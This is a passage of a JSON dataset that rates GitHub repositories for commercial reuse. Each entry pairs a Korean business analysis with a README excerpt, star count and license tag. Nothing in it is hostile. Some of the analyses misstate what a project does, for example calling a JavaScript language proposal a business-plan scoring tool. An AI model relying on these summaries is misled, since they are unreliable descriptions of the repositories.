프로젝트 분석\n\n## 왜 보물인가\n별점이 적지만 최근까지 활발히 유지 중인 오픈소스 프로젝트로, MIT 라이선스를 통해 자유롭게 상업화할 수 있는 기반을 갖추고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **커뮤니티 관리 SaaS**: 온라인 커뮤니티 운영자들을 위한 월 구독형 관리 플랫폼으로 판매\n2. **기업 내부 협업 도구**: 대기업","readme_excerpt":"# Carter\n\nCarter is a framework that is a thin layer of extension methods and functionality over ASP.NET Core allowing the code to be more explicit and most importantly more enjoyable.\n\nFor a better understanding, take a good look at the [samples](https://github.com/CarterCommunity/Carter/tree/master/samples) inside this repo. The samples demonstrate usages of elegant extensions around common ASP.NET Core types as shown below.  \n\nOther extensions include:\n\n* `Validate<T> / ValidateAsync<T>` - [FluentValidation](https://github.com/JeremySkinner/FluentValidation) extensions to validate incoming HTTP requests which is not available with ASP.NET Core Minimal APIs.\n* `BindFile/BindFiles/BindFileAndSave/BindFilesAndSave` - Allows you to easily get access to a file/files that has been uploaded. Alternatively you can call `BindFilesAndSave` and this will save it to a path you specify.\n* `MapPost<T>/MapPut<T>` - Allows Carter to validate `T` and if it fails it returns a 422 Problem Details resp","composite_score":0.0374,"license_safety_tag":"safe"},{"name":"Jigsaw-Code/outline-server","github_url":"https://github.com/Jigsaw-Code/outline-server","stars":5,"language":"TypeScript","license":"apache-2.0","abandonment_months":0,"description":"# Outline Server 비즈니스 분석\n\n## 왜 보물인가\n개인과 조직이 인터넷 접근을 안전하게 관리할 수 있도록 돕는 오픈소스 솔루션으로, 점점 강해지는 네트워크 보안 규제 속에서 수요가 계속 증가할 것으로 예상됩니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업용 보안 SaaS 플랫폼**\n- 기업의 원격 근무자들이 회사 네트워크에 안전하게 접속하는 ","readme_excerpt":"# Outline Server\n\n![Build and Test](https://github.com/OutlineFoundation/outline-server/actions/workflows/build_and_test_debug.yml/badge.svg?branch=master) [![Mattermost](https://badgen.net/badge/Mattermost/Outline%20Community/blue)](https://community.internetfreedomfestival.org/community/channels/outline-community) [![Reddit](https://badgen.net/badge/Reddit/r%2Foutlinevpn/orange)](https://www.reddit.com/r/outlinevpn/)\n\nOutline Server is the component that provides the Shadowsocks service (via [outline-ss-server](https://github.com/OutlineFoundation/tunnel-server/)) and a service management API. You can deploy this server directly following simple instructions in this repository, or if you prefer a ready-to-use graphical interface you can use the [Outline Manager](https://github.com/OutlineFoundation/outline-apps/).\n\n**Components:**\n\n- **Outline Server** ([`src/shadowbox`](src/shadowbox)): The core proxy server that runs and manages [outline-ss-server](https://github.com/OutlineFoundat","composite_score":0.0373,"license_safety_tag":"safe"},{"name":"zhangyuang/ssr","github_url":"https://github.com/zhangyuang/ssr","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":2,"description":"# zhangyuang/ssr 분석\n\n## 왜 보물인가\n웹사이트 렌더링 성능을 획기적으로 개선하는 기술로, 사용자가 웹페이지를 더 빠르게 볼 수 있게 만듭니다.\n\n## 어디에 쓸 수 있나\n- **전자상거래 플랫폼**: 쇼핑몰에서 상품 페이지 로딩 속도를 2배 이상 빠르게 하여 구매 전환율 증대\n- **언론사/뉴스 앱**: 기사 페이지를 순간적으로 표시하여 ","readme_excerpt":"<div>\n<a href=\"./README_Zh.md\">简体中文</a> ｜ English\n</div>\n\n<h1 align=\"center\"> SSR </h1>\n<div align=\"center\">\n  <img src=\"https://gw.alicdn.com/tfs/TB1ckATCGL7gK0jSZFBXXXZZpXa-540-540.jpg\" width=\"300\" />\n</div>\n<br />\n\n<div align=\"center\">\n  <strong>A most advanced ssr framework on Earth that implemented serverless-side render specification for faas and traditional web server.</strong>\n</div>\n<br />\n<div align=\"center\">\n<a href=\"https://github.com/zhangyuang/ssr/actions\" target=\"_blank\"><img src=\"https://github.com/zhangyuang/ssr/workflows/CI/badge.svg\" alt=\"githubActions\" />\n<a href=\"https://www.cypress.io/\" target=\"_blank\"><img src=\"https://img.shields.io/badge/cypress-dashboard-brightgreen.svg\" alt=\"cypress\" />\n<a href=\"https://github.com/zhangyuang/ssr\" target=\"_blank\"><img src=\"https://img.shields.io/badge/node-%3E=20-green.svg?color=4dc71f\" alt=\"Node\" ></a>\n<a href=\"https://github.com/zhangyuang/ssr\" target=\"_blank\"><img src=\"https://img.shields.io/github/stars/zhangyuang/ssr.svg?","composite_score":0.0373,"license_safety_tag":"safe"},{"name":"codacy/tools-for-code-review-engineers","github_url":"https://github.com/codacy/tools-for-code-review-engineers","stars":11,"language":"","license":"unknown","abandonment_months":2,"description":"# codacy/tools-for-code-review-engineers 분석\n\n## 왜 보물인가\n소프트웨어 개발팀이 코드 검토(품질 관리) 작업을 자동화하고 효율화할 수 있는 실용적인 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발팀을 위한 \"코드 검토 자동화 플랫폼\" 구독 서비스로 월별 요금 부과\n2. **내부 업무 도구","readme_excerpt":"# List of tools for code review engineers\n\n![List of tools for code review engineers](images/title.png)\n\nIf you perform code reviews at your company we hope that this list of tools adds value to your GitHub workflow.\nWe created this list recently and we'll periodically keep adding more tools.\nFeel free to contribute your suggestions.\n\n| Tool | Description |\n| ---- | ----------- |\n| [Gitpod](https://gitpod.io/) | Always ready to code - spin up fresh, automated dev environments for each task, in the cloud, in seconds.\nGitpod is an open-source developer platform automating the provisioning of ready-to-code developer environments. |\n| [Pull Reminders](https://pullreminders.com/) (from Pull Panda) | Review and merge pull requests faster with Slack reminders and notifications. |\n| [Pull Assigner](https://pullpanda.com/assigner) (from Pull Panda) | Pull Assigner assigns code reviews to make your process more balanced and efficient: 1) Organize reviewers into groups using GitHub Teams 2) Assig","composite_score":0.0372,"license_safety_tag":"unknown"},{"name":"joeky888/fil","github_url":"https://github.com/joeky888/fil","stars":6,"language":"Go","license":"unknown","abandonment_months":3,"description":"# joeky888/fil 프로젝트 분석\n\n## 왜 보물인가\n파일 처리와 관련된 작은 규모의 유틸리티 도구로, 특정 업무 자동화에 활용할 가능성이 있습니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 회사 내 반복적인 파일 정리 작업을 자동으로 처리하는 직원용 프로그램\n- **API 판매**: 다른 소프트웨어 개발자들이 파일 처리 기능을 자신의","readme_excerpt":"![Screen shot](https://i.imgur.com/Ike5iIJ.png)\n\n### Features\n\n* Pure Go, static binary without [libmagic](http://darwinsys.com/file)\n* Cross-platform: No unix specific code like [mmap](https://godoc.org/golang.org/x/exp/mmap)\n\n### Install binary\n\nDownload from https://github.com/file-go/fil/releases\n\n### Install from source\n\n```sh\ngo install github.com/file-go/fil@latest\n```\n\n### Usage\n\nJust like unix [file](https://en.wikipedia.org/wiki/File_(command)) command\n\n```sh\n$ fil <FILE_NAME>\n```\n\n### MIT Licence\n\nThe code is based on [toybox](https://en.wikipedia.org/wiki/Toybox) (but it is written in C, and only runs on unix-like OS)\n\n### TODO\n\n1. Port more code from [toybox/file.c](https://github.com/landley/toybox/blob/master/toys/posix/file.c)\n2. Port more code from [filetype/matchers](https://github.com/h2non/filetype/tree/master/matchers)\n3. [More magic](https://en.wikipedia.org/wiki/Magic_number_(programming))\n","composite_score":0.0371,"license_safety_tag":"unknown"},{"name":"shakiba/planck.js","github_url":"https://github.com/shakiba/planck.js","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":2,"description":"# planck.js 분석\n\n## 왜 보물인가\n물리 시뮬레이션 기능을 간단한 코드로 구현할 수 있어서, 게임·교육·시각화 분야의 개발자들이 복잡한 계산 없이 현실적인 움직임을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 게임 플랫폼**: 웹 기반 캐주얼 게임에서 캐릭터와 물체의 현실적인 낙하·충돌 효과를 자동으로 처리\n2. **교육용 시뮬","readme_excerpt":"# Planck.js\n\nPlanck.js is JavaScript/TypeScript rewrite of Box2D physics engine for cross-platform HTML5 game development.\n\n#### Motivations\n\n- Taking advantage of Box2D's efforts and achievements\n- Developing readable and editable code in JavaScript/TypeScript\n- Providing idiomatic JavaScript/TypeScript API\n- Optimizing the library for web and mobile platforms\n\n#### [Documentation](https://piqnt.com/planck.js/docs/)\n\n#### [Examples](https://piqnt.com/planck.js/)\n\n#### [Discord](https://discord.com/invite/znjh6J7)\n\n#### [Made with Planck.js](https://github.com/piqnt/planck.js/wiki/)\n\n#### [Report Issues](https://github.com/piqnt/planck.js/issues)\nTo speed up resolving issues, please provide [testbed](https://piqnt.com/planck.js/docs/testbed) code to reproduce the issue.\n","composite_score":0.0371,"license_safety_tag":"safe"},{"name":"doctrine/DoctrineMigrationsBundle","github_url":"https://github.com/doctrine/DoctrineMigrationsBundle","stars":5,"language":"PHP","license":"mit","abandonment_months":2,"description":"# Doctrine Migrations Bundle 상용화 분석\n\n## 왜 보물인가\n데이터베이스 변경 이력을 자동으로 관리해주는 도구로, 웹 서비스가 성장하면서 피할 수 없는 데이터베이스 구조 변경을 안전하고 체계적으로 처리할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 (다중 고객 환경 관리)**\n- 수백 개의 고객사별 데이터","readme_excerpt":"DoctrineMigrationsBundle\n========================\n\nThis bundle integrates the [Doctrine Migrations library](http://www.doctrine-project.org/projects/migrations.html)\ninto Symfony applications. Database migrations help you version the changes in\nyour database schema and apply them in a predictable way on every server running\nthe application.\n\n[Read the documentation of this bundle](https://symfony.com/doc/current/bundles/DoctrineMigrationsBundle/index.html).\n","composite_score":0.0369,"license_safety_tag":"safe"},{"name":"tekezo/Karabiner-Elements","github_url":"https://github.com/tekezo/Karabiner-Elements","stars":6,"language":"C++","license":"unlicense","abandonment_months":0,"description":"# Karabiner-Elements 상용화 분석\n\n## 왜 보물인가\nMac 사용자의 키보드 입력을 자유롭게 커스터마이징할 수 있는 강력한 도구로, 반복적인 작업을 자동화하거나 개인맞춤형 단축키를 만들어 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: Mac 전문가/프로그래머 대상 \"생산성 부스터\" 구독 서비스 (","readme_excerpt":"[![Build Status](https://github.com/pqrs-org/Karabiner-Elements/workflows/Karabiner-Elements%20CI/badge.svg)](https://github.com/pqrs-org/Karabiner-Elements/actions)\n[![License](https://img.shields.io/badge/license-Public%20Domain-blue.svg)](https://github.com/pqrs-org/Karabiner-Elements/blob/main/LICENSE.md)\n\n# Karabiner-Elements\n\nKarabiner-Elements is a powerful key remapper for macOS.\n\n## Download\n\nYou can download Karabiner-Elements from the [official site](https://karabiner-elements.pqrs.org/).\n\nAlternatively, if you use [Homebrew](https://brew.sh/), you can install Karabiner-Elements with `brew install --cask karabiner-elements`.\n\n### Old releases\n\nYou can download previous versions of Karabiner-Elements from the [release notes](https://karabiner-elements.pqrs.org/docs/releasenotes/).\n\n## Supported systems\n\n- macOS 26 Tahoe\n    - Both Intel-based Macs and Apple Silicon Macs\n- macOS 15 Sequoia\n    - Both Intel-based Macs and Apple Silicon Macs\n- macOS 14 Sonoma\n    - Both Intel-ba","composite_score":0.0369,"license_safety_tag":"unknown"},{"name":"github/super-linter","github_url":"https://github.com/github/super-linter","stars":6,"language":"Shell","license":"MIT","abandonment_months":2,"description":"# Super-Linter 사업화 분석\n\n## 왜 보물인가\n프로그래머가 작성한 코드의 실수를 자동으로 찾아주는 검사 도구로, 소프트웨어 품질 관리 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 코드 품질 검사 자동화 플랫폼으로 구독형 서비스 제공\n2. **내부 업무 도구**: 개발사들의 코드 관리 시스템에 내장하여","readme_excerpt":"\nThis repository is a fork of the upstream https://github.com/super-linter/super-linter. Please direct all pull requests and issues there as this repository will not always be up to date.\n","composite_score":0.0368,"license_safety_tag":"safe"},{"name":"facebook/reason","github_url":"https://github.com/facebook/reason","stars":5,"language":"OCaml","license":"mit","abandonment_months":2,"description":"# facebook/reason 저장소 분석\n\n## 왜 보물인가\nFacebook이 만든 프로그래밍 언어로, 복잡한 소프트웨어 개발에서 실수를 줄이고 안정성을 높일 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **금융 SaaS**: 거래 시스템이나 결제 플랫폼에서 버그로 인한 금전 손실을 사전에 방지\n2. **헬스케어 내부 도구**: 의료 데이터 ","readme_excerpt":"<p align=\"center\"><img src=\"https://reasonml.github.io/img/reason.svg\" alt=\"logo\" width=\"316\" /></p>\n<h1 align=\"center\">Reason</h1>\n<p align=\"center\">Simple, fast & type safe code that leverages the JavaScript & OCaml ecosystems.</p>\n<p align=\"center\">\n  <a href=\"https://dev.azure.com/reasonml/reason/_build/latest?definitionId=2?branchName=master\">\n    <img src=\"https://dev.azure.com/reasonml/reason/_apis/build/status/reasonml.reason?branchName=master\" alt=\"Build Status\" />\n  </a>\n  <a href=\"https://circleci.com/gh/reasonml/reason/tree/master\">\n    <img src=\"https://circleci.com/gh/reasonml/reason/tree/master.svg?style=svg\" alt=\"CircleCI\" />\n  </a>\n  <a href=\"https://discord.gg/reasonml\">\n    <img src=\"https://img.shields.io/discord/235176658175262720.svg?logo=discord&colorb=blue\" alt=\"Chat\" />\n  </a>\n</p>\n\n\n## Latest Releases:\n\n[![native esy package on npm][reason-badge]](https://www.npmjs.com/package/@esy-ocaml/reason)\n\n## User Documentation\n\n**The Reason user docs live online at [ht","composite_score":0.0368,"license_safety_tag":"safe"},{"name":"flarum/core","github_url":"https://github.com/flarum/core","stars":15,"language":"PHP","license":"mit","abandonment_months":0,"description":"# Flarum/Core 상용화 분석\n\n## 왜 보물인가\n누구나 쉽게 커뮤니티 포럼을 만들 수 있도록 설계된 현대적인 게시판 플랫폼으로, 설치와 관리가 간단하면서도 기능이 풍부합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: \"포럼 빌더\" 형태로 제공하여 기업들이 클릭만으로 자체 커뮤니티를 구축하고 운영하게 하는 서비스\n2. **내부 업무","readme_excerpt":"<p align=\"center\">\n\n[![flarum logo](https://flarum.org/assets/img/flarum-banner.png)](https://flarum.org/)\n\n</p>\n\n<p align=\"center\">\n\n[![Backend Tests](https://github.com/flarum/framework/actions/workflows/backend.yml/badge.svg)](https://github.com/flarum/framework/actions/workflows/backend.yml)\n[![Total Downloads](https://img.shields.io/packagist/dt/flarum/core)](https://packagist.org/packages/flarum/core)\n[![Latest Version](https://img.shields.io/github/v/release/flarum/core?sort=semver)](https://packagist.org/packages/flarum/core)\n[![License](https://img.shields.io/packagist/l/flarum/core)](https://packagist.org/packages/flarum/core)\n[![StyleCI](https://github.styleci.io/repos/28257573/shield?style=flat)](https://github.styleci.io/repos/28257573)\n\n</p>\n\n## About Flarum\n\n**[Flarum](https://flarum.org/) is a delightfully simple discussion platform for your website.** It's fast and easy to use, with all the features you need to run a successful community. It is designed to be:\n\n* **Fas","composite_score":0.0368,"license_safety_tag":"safe"},{"name":"turbot/steampipe-mod-aws-thrifty","github_url":"https://github.com/turbot/steampipe-mod-aws-thrifty","stars":17,"language":"Pascal","license":"Apache-2.0","abandonment_months":2,"description":"# Steampipe AWS Thrifty 저장소 분석\n\n## 왜 보물인가\nAWS 클라우드 사용료를 자동으로 분석해 낭비되는 비용을 찾아주는 도구로, 기업들의 월 클라우드 청구액을 10~30% 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 IT기업들이 월 구독 형태로 자신의 AWS 비용을 자동 모니터링하는 웹 대시보드 ","readme_excerpt":"# AWS Thrifty Mod for Powerpipe\n\nAn AWS cost savings and waste checking tool.\n\nRun checks in a dashboard:\n\n![image](https://raw.githubusercontent.com/turbot/steampipe-mod-aws-thrifty/main/docs/aws_thrifty_dashboard.png)\n\nOr in a terminal:\n\n![image](https://raw.githubusercontent.com/turbot/steampipe-mod-aws-thrifty/main/docs/aws_thrifty_mod_terminal.png)\n\n## Documentation\n\n- **[Benchmarks and controls →](https://hub.powerpipe.io/mods/turbot/aws_thrifty/controls)**\n- **[Named queries →](https://hub.powerpipe.io/mods/turbot/aws_thrifty/queries)**\n\n## Getting Started\n\n### Installation\n\nInstall Powerpipe (https://powerpipe.io/downloads), or use Brew:\n\n```sh\nbrew install turbot/tap/powerpipe\n```\n\nThis mod also requires [Steampipe](https://steampipe.io) with the [AWS plugin](https://hub.steampipe.io/plugins/turbot/aws) as the data source. Install Steampipe (https://steampipe.io/downloads), or use Brew:\n\n```sh\nbrew install turbot/tap/steampipe\nsteampipe plugin install aws\n```\n\nSteampipe will a","composite_score":0.0367,"license_safety_tag":"safe"},{"name":"ngx-translate/core","github_url":"https://github.com/ngx-translate/core","stars":5,"language":"TypeScript","license":"mit","abandonment_months":1,"description":"# ngx-translate/core 상용화 분석\n\n## 왜 보물인가\n여러 언어를 지원하는 웹 애플리케이션을 만들 때 필요한 핵심 도구로, 전 세계 사용자를 대상으로 하는 서비스의 필수 구성요소입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 한국, 미국, 일본 등 다국가 사용자를 위한 클라우드 기반 협업 도구(예: 프로젝트 관리 플랫폼)","readme_excerpt":"# @ngx-translate/core ![Buildstatus](https://github.com/ngx-translate/core/actions/workflows/ngx-translate-test.yml/badge.svg) [![npm version](https://badge.fury.io/js/%40ngx-translate%2Fcore.svg)](https://badge.fury.io/js/%40ngx-translate%2Fcore)\n\nThe internationalization (i18n) library for Angular.\n<br/>\n\n## Angular 16 - 21\n\nThe new [documentation](https://ngx-translate.org/) now covers installation on\nAngular 16+ and is divided into smaller, more readable sections, making it\neasier to digest than this big README. It also documents the additional\ninterfaces and explains how to develop custom plugins.\n\n- [Full documentation](https://ngx-translate.org)\n- [Migration guide ngx-translate v16 -> v17](https://ngx-translate.org/getting-started/migration-guide/)\n- [Release Notes](https://github.com/ngx-translate/core/releases)\n\nIn addition to that, a getting started tutorial is available here:\n[How to Translate Your Angular App with NGX-Translate](https://www.codeandweb.com/babeledit/tutorial","composite_score":0.0367,"license_safety_tag":"safe"},{"name":"compose-spec/compose-spec","github_url":"https://github.com/compose-spec/compose-spec","stars":5,"language":"Dockerfile","license":"Apache-2.0","abandonment_months":1,"description":"# compose-spec/compose-spec 보물 분석\n\n## 왜 보물인가\n여러 프로그램을 한 번에 실행하도록 설정하는 표준 규칙을 정의한 저장소로, 소프트웨어 개발사들이 서로 호환되는 시스템을 만들 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 앱 개발 플랫폼이 이 표준을 따르도록 제공하여, 개발자들이 쉽","readme_excerpt":"# Compose Specification\n{:.no_toc}\n\nThe Compose specification establishes a standard for the definition of\nmulti-container platform-agnostic applications. The specification can be found\n[here](00-overview.md).\n\n* ToC\n{:toc}\n\n## Use cases\n\nTo provide more context on the Compose specification the following section gives\nexample use cases for each part of the specification.\n\n### Development tools\n\nDevelopers can use a Compose file to specify a container-based application\nthat will run as a set of containers on a local container engine. The Compose\nimplementation in this scenario could offer some specific features (local\nvolume binding, live-reload) to better address development needs. The\napplication definition and Compose model is the same used as that used for other\nuse cases. Platform features expected by the specification (like configs and\nsecrets) can be mocked with local resources.\n\n### Kubernetes deployment\n\nKubernetes container orchestration relies on a set of abstract concepts an","composite_score":0.0367,"license_safety_tag":"safe"},{"name":"SAllen0400/swift-news","github_url":"https://github.com/SAllen0400/swift-news","stars":5,"language":"","license":"unknown","abandonment_months":2,"description":"# swift-news 상업화 분석\n\n## 왜 보물인가\n뉴스 데이터를 빠르게 수집하고 정리해주는 도구로, 뉴스 기반 비즈니스를 하는 기업들이 매일 필요로 하는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **뉴스 큐레이션 SaaS**: 특정 산업/키워드의 뉴스를 자동으로 모아 요약해주는 구독 서비스\n2. **언론사 내부 도구**: 기자들이 경쟁사 기사를 자","readme_excerpt":"Swift News is a YouTube show from [Sean Allen](https://youtube.com/seanallen \"Sean Allen - YouTube Channel\") where he shares the latest news, articles, videos, podcasts, etc... from the world of Swift and iOS Development.  \n\nSwift News releases about once a week along with an email newsletter. [Subscribe](https://swiftnews.kit.com/newsletter) to the newsletter to get the latest Swift News in your inbox. This repository is home for all the links featured in Swift News.\n\n# March 26, 2026\n[Swift News - YouTube Video](https://youtu.be/VU-NiioUpxg)  \n\n[App Store Connect CLI](https://asccli.sh/)  \n[App Store Connect CLI (GitHub)](https://github.com/rudrankriyam/App-Store-Connect-CLI)  \n[Rudrank on X](https://x.com/rudrank)  \n[WinWinKit](https://winwinkit.com/)  \n[Paul Hudson Skills Tweet](https://x.com/twostraws/status/2031750911429652886)  \n[iOS Developer Skills by Dimillian](https://dimillian.github.io/Skills/)  \n[Swift Concurrency: Zero to Hero](https://swiftology.io/articles/swift-concur","composite_score":0.0364,"license_safety_tag":"unknown"},{"name":"igorwojda/android-showcase","github_url":"https://github.com/igorwojda/android-showcase","stars":8,"language":"Kotlin","license":"MIT","abandonment_months":0,"description":"# android-showcase 분석 보고서\n\n## 왜 보물인가\n안드로이드 앱 개발의 최신 방식과 좋은 사례를 한 곳에 모아놓은 학습 및 참고 자료로, 개발자들이 더 빠르고 올바르게 앱을 만들 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **안드로이드 앱 개발 교육 플랫폼**: 개발사 또는 교육 기관이 이 코드를 기반으로 온라인 강의나 부트캠프 운","readme_excerpt":"# 💎 Android Showcase 2.0\n\n[![Kotlin Version](https://img.shields.io/badge/Kotlin-2.x-blue.svg)](https://kotlinlang.org)\n[![AGP](https://img.shields.io/badge/AGP-8.x-blue?style=flat)](https://developer.android.com/studio/releases/gradle-plugin)\n[![Gradle](https://img.shields.io/badge/Gradle-9.x-blue?style=flat)](https://gradle.org)\n[![CodeFactor](https://www.codefactor.io/repository/github/igorwojda/android-showcase/badge)](https://www.codefactor.io/repository/github/igorwojda/android-showcase)\n\nA production-ready Android application demonstrating modern development practices and architectural patterns. This project showcases how to build scalable, maintainable, and testable Android applications using industry-standard tools and libraries.\n\nBuilt with **Clean Architecture** principles, this app serves as a comprehensive example of modular design, advanced Gradle configuration, and robust CI/CD practices. Perfect for teams looking to establish solid architectural foundations for large-sc","composite_score":0.0364,"license_safety_tag":"safe"},{"name":"jonas/tig","github_url":"https://github.com/jonas/tig","stars":6,"language":"C","license":"gpl-2.0","abandonment_months":1,"description":"# jonas/tig 상용화 분석\n\n## 왜 보물인가\n터미널(검은 화면) 환경에서 코드 변경 이력을 쉽게 확인할 수 있는 도구로, 개발자들의 일상적 업무 효율을 크게 높입니다.\n\n## 어디에 쓸 수 있나\n1. **개발팀 내부 도구 SaaS**: 코드 리뷰 플랫폼에 Tig 기능을 통합하여 팀 협업 시간을 단축하는 유료 서비스\n2. **기업용 DevOps 대시","readme_excerpt":"Tig: text-mode interface for Git\n================================\n:docext: adoc\n\nimage:https://github.com/jonas/tig/workflows/Linux/badge.svg[Linux CI,link=https://github.com/jonas/tig/actions?query=workflow%3ALinux]\nimage:https://github.com/jonas/tig/workflows/macOS/badge.svg[macOS CI,link=https://github.com/jonas/tig/actions?query=workflow%3AmacOS]\nimage:https://ci.appveyor.com/api/projects/status/jxt1uf52o7r0a8r7/branch/master?svg=true[AppVeyor Build,link=https://ci.appveyor.com/project/fonseca/tig]\n\nWhat is Tig?\n------------\nTig is an ncurses-based text-mode interface for git. It functions mainly\nas a Git repository browser, but can also assist in staging changes for\ncommit at chunk level and act as a pager for output from various Git\ncommands.\n\nResources\n---------\n\n - Homepage:\thttps://github.com/jonas/tig[]\n - Manual:\thttps://www.mankier.com/7/tigmanual[]\n - Tarballs:\thttps://github.com/jonas/tig/releases[]\n - Q&A:\t\thttps://stackoverflow.com/questions/tagged/tig[]\n\nBugs and Featu","composite_score":0.0363,"license_safety_tag":"restricted"},{"name":"PaddiM8/kalk","github_url":"https://github.com/PaddiM8/kalk","stars":34,"language":"Rust","license":"MIT","abandonment_months":1,"description":"# kalk 저장소 분석\n\n## 왜 보물인가\n복잡한 수학 계산을 정확하게 처리하는 기술로, 금융·공학·과학 분야의 신뢰도 높은 계산 도구가 필요한 곳이라면 어디든 핵심 기술이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **온라인 금융 계산 서비스**: 대출 이자, 투자 수익률, 세금 계산 등을 정확히 제공하는 웹사이트\n- **건축·공학 설계 소프트웨어","readme_excerpt":"![](logo.png)\n\nKalker is a calculator program/website that supports user-defined variables, functions, differentiation, and integration. It runs on Windows, macOS, Linux, Android, and in web browsers (with WebAssembly).\n\n[![Crates.io](https://img.shields.io/crates/v/kalker)](https://crates.io/crates/kalker) ![npm](https://img.shields.io/npm/v/@paddim8/kalk) [![GitHub](https://img.shields.io/github/license/PaddiM8/kalk)](https://github.com/PaddiM8/kalker/blob/master/LICENSE) [![Docs.rs](https://docs.rs/kalk/badge.svg)](https://docs.rs/kalk/latest/kalk/) ![Build status](https://img.shields.io/github/actions/workflow/status/PaddiM8/kalker/build.yml?branch=master&label=build%20%26%20test)\n\n[Website - Try it out here!](https://kalker.xyz)\n\n<img src=\"preview.png\" width=\"750\">\n\n# Features\n\n* Operators: `+`, `-`, `*`, `/`, `!`\n* Groups: `()`, `[]`, `⌈ceil⌉`, `⌊floor⌋`\n* [Vectors](https://kalker.xyz/#vectors): (x, y, z, ...)\n* [Matrices](https://kalker.xyz/#matrices): [x, y, z; a, b, c; ...]\n* ","composite_score":0.0363,"license_safety_tag":"safe"},{"name":"OlympusDAO/olympus-contracts","github_url":"https://github.com/OlympusDAO/olympus-contracts","stars":7,"language":"Solidity","license":"AGPL-3.0","abandonment_months":0,"description":"# OlympusDAO/olympus-contracts 분석\n\n## 왜 보물인가\n암호화폐 금융 시스템을 자동으로 관리하는 핵심 코드로, 금융 기관이나 암호화폐 플랫폼이 안전하게 자산을 운영하는 데 직접 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **암호화폐 거래소 운영 SaaS**: 개인 투자자나 소규모 거래소가 이 코드를 기반으로 자동 자산 ","readme_excerpt":"# Ω Olympus Smart Contracts\n\n![image](https://img.shields.io/github/forks/OlympusDAO/olympus-contracts?style=social)\n\nThis is the main Olympus smart contract development repository.\n\n## 🔧 Setting up local development\n\n### Requirements\n\n- [Node.js 22+](https://nodejs.org/)\n- [git](https://git-scm.com/downloads)\n\n### Local Setup Steps\n\n```sh\n# Clone the repository\ngit clone https://github.com/OlympusDAO/olympus-contracts.git\n\n# Install dependencies\nyarn install\n\n# Set up environment variables (keys)\ncp .env.example .env # (linux)\ncopy .env.example .env # (windows)\n\n# compile solidity, the below will automatically also run yarn typechain\nyarn compile\n\n# if you want to explicitly run typechain, run\nyarn compile --no-typechain\nyarn typechain\n\n# run a local hardhat node\nyarn run start\n\n# test deployment or deploy\n# yarn run deploy:<network>, example:\nyarn run deploy:hardhat\n```\n\n### Local Setup Steps (with Docker)\n\nA Docker image is available to simplify setup.\n\n```sh\n# First setup keys, to ","composite_score":0.0363,"license_safety_tag":"risky"},{"name":"lucacasonato/proposal-evaluator-attributes","github_url":"https://github.com/lucacasonato/proposal-evaluator-attributes","stars":5,"language":"HTML","license":"MIT","abandonment_months":2,"description":"# Proposal Evaluator Attributes 분석 리포트\n\n## 왜 보물인가\n제안서나 기획안의 품질을 자동으로 평가하고 개선점을 제시해주는 도구로, 의사결정 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 스타트업 투자사들이 받는 수백 개의 사업계획서를 빠르게 스크리닝하고 채점하는 자동 평가 플랫폼\n","readme_excerpt":"# Source Phase Imports\n\n## Status\n\nChampion(s): Luca Casonato, Guy Bedford\n\nAuthor(s): Luca Casonato, Guy Bedford, Nicolo Ribaudo\n\nStage: 3\n\nStage 3 reviewers: Daniel Ehrenberg, Kris Kowal\n\nUpstream PR: https://github.com/tc39/ecma262/pull/3492\n\n## Motivation\n\nFor both JavaScript and WebAssembly, there is a need to be able to more closely\ncustomize the loading, linking, and execution of modules beyond the standard\nhost execution model.\n\nFor JavaScript, creating userland loaders would require a module source type\nin order to share the host parsing, execution, security, and caching semantics.\n\nFor WebAssembly, imports and exports for WebAssembly modules often require custom\ninspection and wrapping in order to be set up correctly, which typically requires\nmanual fetch and instantiation work that is not provided for in the current host\n[ESM integration][wasm-esm] proposal.\n\nSupporting syntactical module source imports as a new import phase creates a\nprimitive that can extend the static, se","composite_score":0.0362,"license_safety_tag":"safe"},{"name":"thecodingmachine/workadventure","github_url":"https://github.com/thecodingmachine/workadventure","stars":6,"language":"TypeScript","license":"unknown","abandonment_months":0,"description":"# WorkAdventure 저장소 분석\n\n## 왜 보물인가\n직원들이 온라인 화상회의처럼 자유롭게 돌아다니며 소통할 수 있는 가상 업무 공간으로, 재택근무의 '고립감' 문제를 게임처럼 해결하는 혁신적 솔루션입니다.\n\n## 어디에 쓸 수 있나\n**1. SaaS 서비스:** 중소기업용 가상 사무실 플랫폼으로 월 구독료를 받으며 제공\n**2. 내부 업무 도구:*","readme_excerpt":"![](https://github.com/thecodingmachine/workadventure/workflows/Continuous%20Integration/badge.svg) [![Discord](https://img.shields.io/discord/821338762134290432?label=Discord)](https://discord.gg/G6Xh9ZM9aR) ![Awesome](https://awesome.re/badge.svg)\n\n![WorkAdventure office image](README-MAP.png)\n\n# WorkAdventure\n\n\nWorkAdventure is a platform that allows you to design **fully customizable collaborative virtual worlds** (metaverse). \n\nWith your own avatar, you can **interact spontaneously** with your colleagues, clients, partners (using a **video-chat system**, triggered when you approach someone).\nImagine **all types of immersive experiences** (recruitments, onboarding, trainings, digital workplace, internal/external events) on desktop, mobile or tablet.\n\n_The little plus? The platform is **GDPR** and **open source**!_\n\n**See more features for your [virtual 